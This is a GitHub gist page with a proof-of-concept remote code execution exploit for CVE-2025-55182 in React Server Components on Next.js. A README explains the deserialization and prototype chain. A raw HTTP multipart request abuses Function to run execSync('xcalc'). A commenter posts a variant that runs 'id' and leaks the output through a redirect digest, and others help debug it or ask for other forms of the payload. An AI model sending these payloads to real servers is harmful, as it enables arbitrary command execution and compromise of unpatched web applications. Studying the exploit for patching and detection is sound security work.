Skip to content

Instantly share code, notes, and snippets.

@maple3142

maple3142/CVE-2025-55182.http

Last active January 4, 2026 12:14
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save maple3142/48bc9393f45e068cf8c90ab865c0f5f3 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save maple3142/48bc9393f45e068cf8c90ab865c0f5f3 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2025-55182 React Server Components RCE POC
Raw
README.md

POC for CVE-2025-55182 that works on Next.js 16.0.6

Core idea

Use the $@ deserialization to get a Chunk reference, and put Chunk.prototype.then as the then property of the root object. Then then would be invoked with root object as this/chunk when it is awaited/resolved.

By setting the status to RESOLVED_MODEL, now we can call initializeModelChunk with a fake chunk that is comlpetely in our control. This is particularly useful since itself and its related functions call many methods from the chunk._response object.

Exploit

The target is to trigger the Blob deserialization, which calls response._formData.get with payload from response._prefix and return the result directly. So all we need is to set response._formData.get to Function so the returned result would be a function with attacker controlled code, then put that to then again so it would be executed.

Raw
CVE-2025-55182.http
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
@Codinplus31
Copy link

Codinplus31 commented Dec 10, 2025

10 12 2025_11 32 16_REC it is giving me this error

sent

POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Accept-Encoding: gzip, deflate, br
Accept: /
Connection: keep-alive
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 689

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:proto:then","status":"resolved_model","reason":-1,"value":"{"then":"$B1337"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: NEXT_REDIRECT;push;/login?a=${res};307;});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

response

HTTP/1.1 500 Internal Server Error
Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
Cache-Control: no-store, must-revalidate
Content-Type: text/x-component
Date: Wed, 10 Dec 2025 10:27:31 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 301

:N1765362450970.6902
0:{"a":"$@1","f":"","b":"development"}
1:D{"time":6.808100000023842}
1:E{"digest":"1681718686","name":"Error","message":"Command failed: id\n'id' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n","stack":[],"env":"Server","owner":null}

@lokkju
Copy link

lokkju commented Dec 10, 2025
edited
Loading

@Codinplus31

:N1765362450970.6902 0:{"a":"$@1","f":"","b":"development"} 1:D{"time":6.808100000023842} 1:E{"digest":"1681718686","name":"Error","message":"Command failed: id\n'id' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n","stack":[],"env":"Server","owner":null}

That sure looks like the 'id' command that your exploit code is running with execSync() isn't available to your process; try other commands? Perhaps it's not even running on a Linux host?

In fact, "'[command]' is not recognized as an internal or external command" is a classic indicator of a Windows environment.

@Codinplus31
Copy link

Codinplus31 commented Dec 10, 2025

I'm using windows. How can I get through the error ?

@Vitalik-Hakim
Copy link

Vitalik-Hakim commented Dec 10, 2025

Holyshittt!!

@Praiseike
Copy link

Praiseike commented Dec 12, 2025

@Codinplus31 you're seeing a windows batch env error and saying it doesn't work XD

@EvtDanya
Copy link

EvtDanya commented Dec 12, 2025

Hey!

Is there any poc with application/x-www-form-urlencoded not multipart/form-data content-type ??

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment